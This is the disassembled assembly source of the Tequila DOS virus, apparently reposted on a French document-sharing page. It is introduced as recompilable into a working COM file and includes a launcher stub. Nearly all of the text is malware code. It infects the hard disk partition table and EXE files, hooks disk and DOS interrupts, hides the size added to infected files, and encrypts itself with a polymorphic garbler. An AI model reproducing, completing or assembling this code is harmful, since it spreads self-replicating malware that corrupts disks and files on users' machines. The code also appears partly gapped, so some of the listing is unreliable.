Tequila

;=============================
; the tequila virus =

; a recompilable =
; dis-assembly =
; specifically designed =
; for assembly to a com file =
; with the a86 assembler. =
; ++++++++++++++++++ =
; if you desire a "perfect" =
; byte for byte source code =
;match-up, the masm assembler=
; must be used and the noted =
;instructions must be changed=
; to comply with masm syntax.=
; in addition, all byte and =
;word pointer references must=
; be changed from b and w to =
; byte pointer and word =
; pointer. =
;=============================
code_seg segment
assume cs:code_seg, ds:code_seg, es:code_seg, ss:code_seg
org 0100
tequila proc near
jmp start
db 000, 000, 000, 000, 000, 000, 000, 0ffh, 0ffh

db 009, 005, 001h, 010h, 000, 000, 002h, 0fah, 000, 00ch
db 00dh, 00ah, 00dh, 00ah

db "welcome to t.tequila's latest production.", 00dh, 00ah
db "contact t.tequila/p.o.box 543/6312 st'hausen/"
db "switzerland.", 00dh, 00ah
db "loving thoughts to l.i.n.d.a", 00dh, 00ah, 00dh, 00ah
db "beer and tequila forever !", 00dh, 00ah, 00dh, 00ah
db "$"
db "execute: mov ax, fe03 / int 21. key to go on!"
program_termination_routine:
push bp
mov bp,sp
sub sp,0ch
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
push cs
pop ds
mov ax,w[6]
inc ax
je 0243h ;masm mod. needed
dec ax
jne 020dh ;masm mod. needed
dec w[8] ;masm mod. needed
jne 0243h ;masm mod. needed
jmp 0246h ;masm mod. needed
mov ah,02ah
call int_21
mov si,cx
mov cx,w[8]
cmp cl,dl
jne 022fh ;masm mod. needed
mov ax,si
sub ax,w[6]
mul b[011h] ;masm mod. needed
add al,dh
add ch,3
cmp al,ch
jae 0237h ;masm mod. needed
mov w[6],0ffffh ;masm mod. needed
jmp 0243h ;masm mod. needed
mov w[6],0 ;masm mod. needed
mov w[8],3 ;masm mod. needed
jmp 02df ;masm mod. needed
mov bx,0b800h
int 011
and ax,030h
cmp ax,030h
jne 0256h ;masm mod. needed
mov bx,0b000h
mov es,bx
xor bx,bx
mov di,0fd8fh
mov si,0fc18h
mov w[bp-2],si
mov w[bp-4],di
mov cx,01e
mov ax,w[bp-2]
imul ax
mov w[bp-8],ax
mov w[bp-6],dx
mov ax,w[bp-4]
imul ax
mov w[bp-0c],ax
mov w[bp-0a],dx
add ax,w[bp-8]
adc dx,w[bp-6]
cmp dx,0f
jae 02b0 ;masm mod. needed
mov ax,w[bp-2]
imul w[bp-4]
idiv w[0f] ;masm mod. needed
add ax,di
mov w[bp-4],ax
mov ax,w[bp-8]
mov dx,w[bp-6]
sub ax,w[bp-0c]
sbb dx,w[bp-0a]
idiv w[0d] ;masm mod. needed
add ax,si
mov w[bp-2],ax
loop 0269 ;masm mod. needed
inc cx
shr cl,1
mov ch,cl
mov cl,0db
es mov w[bx],cx ;masm mod. needed
inc bx
inc bx
add si,012
cmp si,01b8
jl 0260 ;masm mod. needed
add di,034
cmp di,02a3
jl 025d ;masm mod. needed
xor di,di
mov si,0bb
mov cx,02d
cld
movsb
inc di
loop 02d7 ;masm mod. needed
xor ax,ax
int 016
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov sp,bp
pop bp
ret
print_message:
push dx
push ds
push cs
pop ds
mov ah,9
mov dx,012
call int_21
pop ds
pop dx
ret
new_partition_table:
cli
xor bx,bx
mov ds,bx
mov ss,bx
mov sp,07c00
sti
xor di,di
sub w[0413],3 ;masm mod. needed
int 012
mov cl,6
shl ax,cl
mov es,ax
push es
mov ax,022a
push ax
mov ax,0205
mov cx,w[07c30]
inc cx
mov dx,w[07c32]
int 013
retf
db 002, 0fe
db 04c, 0e9
db 080, 004
push cs
pop ds
xor ax,ax
mov es,ax
mov bx,07c00
push es
push bx
mov ax,0201
mov cx,w[0226]
mov dx,w[0228]
int 013
push cs
pop es
cld
mov si,0409
mov di,09be
mov cx,046
rep movsb
mov si,091b
mov di,0a04
mov cx,045
rep movsb
cli
xor ax,ax
mov es,ax
es les bx,[070] ;masm mod. needed
mov w[09b0],bx ;masm mod. needed
mov w[09b2],es ;masm mod. needed
mov es,ax
mov es,ax
es mov w[070],044f ;masm mod. needed
es mov w[072],ds ;masm mod. needed
sti
retf
install:
call next_line
next_line:
pop si
sub si,028f
push si
push ax
push es
push cs
pop ds
mov ax,es
add w[si+2],ax
add w[si+4],ax
dec ax
mov es,ax
mov ax,0fe02
int 021
cmp ax,01fd
je no_partition_infection
es cmp b[0],05a ;masm mod. needed
jne no_partition_infection
es cmp w[3],0bb ;masm mod. needed
jbe no_partition_infection
es mov ax,w[012] ;masm mod. needed
sub ax,0bb
mov es,ax
xor di,di
mov cx,09a4
cld
rep movsb
push es
pop ds
call infect_partition_table
no_partition_infection:
pop es
pop ax
push es
pop ds
pop si
cs mov ss,w[si+4] ;masm mod. needed
chain_to_the_host_file:
cs jmp d[si] ;masm mod. needed
infect_partition_table:
mov ah,02a
int 021
mov w[6],cx ;masm mod. needed
mov w[8],dx ;masm mod. needed
mov ah,052
int 021
es mov ax,w[bx-2] ;masm mod. needed
mov w[03e8],ax ;masm mod. needed
mov ax,03513
int 021
mov w[09a0],bx ;masm mod. needed
mov w[09a2],es ;masm mod. needed
mov ax,03501
int 021
mov si,bx
mov di,es
mov ax,02501
mov dx,03da
int 021
mov b[0a],0 ;masm mod. needed
pushf
pop ax
or ax,0100
push ax
popf
mov ax,0201
mov bx,09a4
mov cx,1
mov dx,080
push ds
pop es
pushf
call d[09a0] ;masm mod. needed
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov ax,02501
mov dx,si
mov ds,di
int 021
popf
jae 0450 ;masm mod. needed
jmp ret ;masm mod. needed
push es
pop ds
cmp w[bx+02e],0fe02
jne 045c ;masm mod. needed
add bx,01be
mov cx,4
mov al,b[bx+4]
cmp al,4
je 0479 ;masm mod. needed
cmp al,6
cmp al,1
add bx,010
loop 0463 ;masm mod. needed
jmp short ret ;masm mod. needed
mov dl,080
mov dh,b[bx+5]
mov w[0228],dx ;masm mod. needed
mov ax,w[bx+6]
mov cx,ax
mov si,6
and ax,03f
cmp ax,si
jbe ret ;masm mod. needed
sub cx,si
mov di,bx
inc cx
mov w[0226],cx ;masm mod. needed
mov ax,0301
mov bx,09a4
pushf
jb ret ;masm mod. needed
dec cx
mov w[di+6],cx
inc cx
sub w[di+0c],si
sbb w[di+0e],0
mov ax,0305
mov bx,0
inc cx
pushf
mov si,01f6
mov di,09a4
mov cx,034
cld
rep movsb
mov ax,0301
mov bx,09a4
mov cx,1
xor dh,dh
pushf
ret
new_interrupt_one:
push bp
mov bp,sp
cs cmp b[0a],1 ;masm mod. needed
cmp w[bp+4],09b4
ja 050b ;masm mod. needed
push ax
push es
les ax,[bp+2]
cs mov w[09a0],ax ;masm mod. needed
cs mov w[09a2],es ;masm mod. needed
cs mov b[0a],1
pop es
pop ax
and w[bp+6],0feff
pop bp
iret
new_interrupt_13:
cmp cx,1
jne 054e ;masm mod. needed
cmp dx,080
jne 054e ;masm mod. needed
cmp ah,3
ja 054e ;masm mod. needed
cmp ah,2
jb 054e ;masm mod. needed
push cx
push dx
dec al
push ax
push bx
add bx,0200
inc cx
pushf
cs call d[09a0] ;masm mod. needed
pop bx
pop ax
mov al,1
cs mov cx,w[0226] ;masm mod. needed
cs mov dx,w[0228] ;masm mod. needed
pushf
cs call d[09a0] ;masm mod. needed
pop dx
pop cx
retf 2
cs jmp d[09a0] ;masm mod. needed
new_timer_tick_interrupt:
push ax
push bx
push es
push ds
xor ax,ax
mov es,ax
push cs
pop ds
mov ax,es
cmp ax,0800
ja 05b0 ;masm mod. needed
cmp ax,w[09b6]
jne 0575 ;masm mod. needed
cmp bx,w[09b4]
je 05b0 ;masm mod. needed
xor ax,ax
mov ds,ax
cs les bx,[09b0] ;masm mod. needed
mov w[070],bx ;masm mod. needed
mov w[072],es ;masm mod. needed
les bx,[04c] ;masm mod. needed
cs mov w[09a0],bx ;masm mod. needed
cs mov w[09a2],es ;masm mod. needed
mov w[04c],09be ;masm mod. needed
mov w[04e],cs ;masm mod. needed
mov w[084],04b1 ;masm mod. needed
mov w[086],cs ;masm mod. needed
pop ds
pop es
pop bx
pop ax
iret
int_21_intercept:
cmp ah,011
jb check_for_handle
cmp ah,012
ja check_for_handle
call adjust_fcb_matches
retf 2
check_for_handle:
cmp ah,04e
jb check_for_previous_installation
cmp ah,04f
ja check_for_previous_installation
call adjust_handle_matches
retf 2
check_for_previous_installation:
cmp ax,0fe02
jne check_for_message_print
not ax
iret
check_for_message_print:
cmp ax,0fe03
jne check_for_execute
cs cmp w[6],0 ;masm mod. needed
jne chain_to_true_int_21
call print_message
iret
check_for_execute:
cmp ax,04b00
je set_stack
cmp ah,04c
jne chain_to_true_int_21
set_stack:
cs mov w[09a6],sp ;masm mod. needed
cs mov w[09a8],ss ;masm mod. needed
cli
push cs
pop ss
mov sp,0ae5
sti
cmp ah,04c
jne to_an_infection
call program_termination_routine
jmp short no_infection
to_an_infection:
call infect_the_file
no_infection:
cli
cs mov ss,w[09a8] ;masm mod. needed
cs mov sp,w[09a6] ;masm mod. needed
sti
jmp short chain_to_true_int_21
chain_to_true_int_21:
cs inc w[09bc] ;masm mod. needed
cs jmp d[09b4] ;masm mod. needed
new_critical_error_handler:
mov al,3
iret
adjust_fcb_matches:
push bx
push es
push ax
mov ah,02f
call int_21
pop ax
pushf
cs call d[09b4] ;masm mod. needed
pushf
push ax
cmp al,0ff
es cmp b[bx],0ff ;masm mod. needed
jne 064f ;masm mod. needed
add bx,7
es mov al,b[bx+017] ;masm mod. needed
and al,01f
cmp al,01f
es sub w[bx+01d],09a4 ;masm mod. needed
es sbb w[bx+01f],0 ;masm mod. needed
pop ax
popf
pop es
pop bx
ret
adjust_handle_matches:
push bx
push es
push ax
mov ah,02f
call int_21
pop ax
pushf
pushf
push ax
jb 0691 ;masm mod. needed
es mov al,b[bx+016] ;masm mod. needed
and al,01f
cmp al,01f
es sub w[bx+01a],09a4 ;masm mod. needed
es sbb w[bx+01c],0 ;masm mod. needed
pop ax
popf
pop es
pop bx
ret
write_to_the_file:
mov ah,040
jmp 069c ;masm mod. needed
read_from_the_file:
mov ah,03f
call 06b4 ;masm mod. needed
sub ax,cx
ret
move_to_end_of_file:
xor cx,cx
xor dx,dx
mov ax,04202
jmp 06b4 ;masm mod. needed
move_to_beginning_of_file:
xor cx,cx
xor dx,dx
mov ax,04200
cs mov bx,w[09a4] ;masm mod. needed
int_21:
cli
pushf
ret
infect_the_file:
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
call check_letters_in_filename
jae good_name
jmp bad_name
good_name:
push dx
push ds
push cs
pop ds
save_and_replace_critical_error_handler:
mov ax,03524
call int_21
mov w[09ba],es ;masm mod. needed
mov ax,02524
mov dx,052a
call int_21
pop ds
pop dx
save_and_replace_file_attribute:
mov ax,04300
call int_21
cs mov w[09aa],cx ;masm mod. needed
jae 06fe ;masm mod. needed
jmp restore_crit_handler
mov ax,04301
xor cx,cx
call int_21
jb 077c ;masm mod. needed
open_file_for_read_write:
mov ax,03d02
call int_21
jb 0771 ;masm mod. needed
push dx
push ds
push cs
pop ds
mov w[09a4],ax ;masm mod. needed
get_filedate:
mov ax,05700
mov w[09ac],dx ;masm mod. needed
mov w[09ae],cx ;masm mod. needed
read_and_check_exe_header:
call 06ad ;masm mod. needed
mov dx,0a49
mov cx,01c
call 069a ;masm mod. needed
push ds
pop es
mov di,0e8
mov cx,020
cmp w[0a49],05a4d ;masm mod. needed
jne 075c ;masm mod. needed
mov ax,w[0a5b]
cld
repne scasw
or w[09ae],01f ;masm mod. needed
jmp 075c ;masm mod. needed
call read_past_end_of_file
call encrypt_and_write_to_file
restore_altered_date:
mov ax,05701
mov dx,w[09ac]
mov cx,w[09ae]
close_the_file:
mov ah,03e
restore_file_attribute:
pop ds
pop dx
mov ax,04301
cs mov cx,w[09aa] ;masm mod. needed
call int_21
restore_crit_handler:
mov ax,02524
cs lds dx,[09b8] ;masm mod. needed
call int_21
bad_name:
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
ret
check_letters_in_filename:
push ds
pop es
mov di,dx
mov cx,-1
xor al,al
cld
repne scasb
not cx
mov di,dx
mov ax,04353
mov si,cx
scasw
dec di
loop 07a5 ;masm mod. needed
mov cx,si
mov di,dx
mov al,056
repne scasb
clc
ret
stc
ret
read_past_end_of_file:
mov cx,-1
mov dx,-0a
call 06a8 ;masm mod. needed
mov dx,0a65
mov cx,8
call 069a ;masm mod. needed
cmp w[0a65],0fdf0 ;masm mod. needed
jne 07f0 ;masm mod. needed
cmp w[0a67],0aac5 ;masm mod. needed
jne 07f0 ;masm mod. needed
mov cx,-1
mov dx,-9
mov dx,0a6b
mov cx,4
call 0696 ;masm mod. needed
ret
clc
ret
encrypt_and_write_to_file:
call move_to_end_of_file
mov si,ax
mov di,dx
mov bx,0a49
mov ax,w[bx+4]
mul w[0d] ;masm mod. needed
sub ax,si
sbb dx,di
jae 080c ;masm mod. needed
jmp out_of_encrypt
mov ax,w[bx+8]
mul w[0b] ;masm mod. needed
sub si,ax
sbb di,dx
mov ax,w[bx+0e]
mov w[4],ax ;masm mod. needed
add w[4],010 ;masm mod. needed
mul w[0b] ;masm mod. needed
add ax,w[bx+010]
sub ax,si
sbb dx,di
sub ax,080
sbb dx,0
add w[bx+0e],09b
mov ax,w[bx+016]
add ax,010
mov ax,w[bx+014]
add ax,09a4
adc dx,0
div w[0d] ;masm mod. needed
inc ax
mov w[0a4d],ax ;masm mod. needed
mov w[0a4b],dx ;masm mod. needed
mov dx,di
mov ax,si
div w[0b] ;masm mod. needed
mov w[0a5f],ax ;masm mod. needed
mov bx,dx
add dx,0960
mov w[0a5d],dx ;masm mod. needed
call copy_to_high_memory_encrypt_write
or w[09ae],01f ;masm mod. needed
mov bx,w[09bc]
and bx,01f
shl bx,1
mov ax,w[bx+0e8]
mov w[0a5b],ax ;masm mod. needed
call move_to_beginning_of_file
mov cx,01c
mov dx,0a49
write_the_new_header:
call 0696 ;masm mod. needed
out_of_encrypt:
ret
copy_to_high_memory_encrypt_write:
push bp
xor ah,ah
int 01a
mov ax,dx
mov bp,dx
push ds
pop es
mov di,0960
mov si,di
mov cx,020
cld
rep stosw
xor dx,dx
mov es,dx
call encrypt_step_one
call encrypt_step_two
call encrypt_step_three
mov b[si],0e9
mov di,028c
sub di,si
sub di,3
inc si
mov w[si],di
mov ax,0a04
call ax
pop bp
ret
encrypt_step_one:
dec bp
es test b[bp],2 ;masm mod. needed
jne 08eb ;masm mod. needed
mov b[si],0e
inc si
call garbler
mov b[si],01f
inc si
call garbler
ret
mov w[si],0cb8c
inc si
inc si
call garbler
mov w[si],0db8e
inc si
inc si
call garbler
ret
encrypt_step_two:
and ch,0fe
dec bp
or ch,1
mov b[si],0be
inc si
mov w[si],bx
inc si
inc si
call garbler
add bx,0960
test ch,1
mov b[si],0bb
inc si
mov w[si],bx
inc si
inc si
call garbler
add bx,0960
test ch,1
je 090c ;masm mod. needed
sub bx,0960
call garbler
mov b[si],0b9
inc si
mov ax,0960
mov w[si],ax
inc si
inc si
call garbler
call garbler
ret
encrypt_step_three:
mov ah,014
mov dh,017
test ch,1
xchg dh,ah
mov di,si
mov al,08a
mov w[si],ax
inc si
inc si
call garbler
xor dl,dl
mov b[0a39],028 ;masm mod. needed
dec bp
mov dl,030
mov b[0a39],dl ;masm mod. needed
mov w[si],dx
inc si
inc si
mov w[si],04346
inc si
inc si
call garbler
mov ax,0fe81
mov cl,0be
test ch,1
mov ah,0fb
mov cl,0bb
mov w[si],ax
inc si
inc si
push bx
add bx,040
mov w[si],bx
inc si
inc si
pop bx
mov b[si],072
inc si
mov dx,si
inc si
call garbler
mov b[si],cl
inc si
mov w[si],bx
inc si
inc si
mov ax,si
sub ax,dx
dec ax
mov bx,dx
mov b[bx],al
call garbler
call garbler
mov b[si],0e2
inc si
sub di,si
dec di
mov ax,di
mov b[si],al
inc si
call garbler
ret
garbler:
dec bp
es test b[bp],0f ;masm mod. needed
je ret ;masm mod. needed
dec bp
es mov al,b[bp] ;masm mod. needed
test al,2
je 0a0e ;masm mod. needed
test al,4
je 09f7 ;masm mod. needed
test al,8
je 09f1 ;masm mod. needed
mov w[si],0c789
inc si
inc si
mov b[si],090
inc si
mov al,085
dec bp
es mov ah,b[bp] ;masm mod. needed
test ah,2
je 0a05 ;masm mod. needed
dec al
or ah,0c0
mov w[si],ax
inc si
inc si
dec bp
je 0a1a ;masm mod. needed
mov al,039
jmp 09f9 ;masm mod. needed
mov b[si],0fc
inc si
ret
make_the_disk_write:
call perform_encryption_decryption
mov ah,040
mov bx,w[09a4]
mov dx,0
mov cx,09a4
pushf
call d[09b4] ;masm mod. needed
jb 0a37 ;masm mod. needed
sub ax,cx
pushf
cmp b[0a39],028 ;masm mod. needed
jne 0a44 ;masm mod. needed
mov b[0a39],0 ;masm mod. needed
call perform_encryption_decryption
popf
ret
perform_encryption_decryption:
mov bx,0
mov si,0960
mov cx,0960
mov dl,b[si]
xor b[bx],dl
inc si
inc bx
cmp si,09a0
jb 0a61 ;masm mod. needed
mov si,0960
loop 0a52 ;masm mod. needed
ret
the_file_decrypting_routine:
push cs
pop ds
mov bx,4
mov si,0964
mov cx,0960
mov dl,b[si]
add b[bx],dl
inc si
inc bx
cmp si,09a4
jb 0a7e ;masm mod. needed
mov si,0964
loop 0a6f ;masm mod. needed
jmp 0390 ;masm mod. needed
;========== the following is not part of the virus ========

;========== but is merely the booster. ========
start:
lea w[0104],exit ;masm mod. needed
mov w[0106],cs ;masm mod. needed
mov bx,cs
sub w[0106],bx ;masm mod. needed
jmp install
exit:
int 020
tequila endp
code_seg ends
end tequila

Tequila

Transféré par

Informations du document

Description originale:

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Tequila

Transféré par

Droits d'auteur :

Formats disponibles

;=============================

; the tequila virus =

db 000, 000, 000, 000, 000, 000, 000, 0ffh, 0ffh

db 00dh, 00ah, 00dh, 00ah

db "execute: mov ax, fe03 / int 21. key to go on!"

;========== the following is not part of the virus ========

Vous aimerez peut-être aussi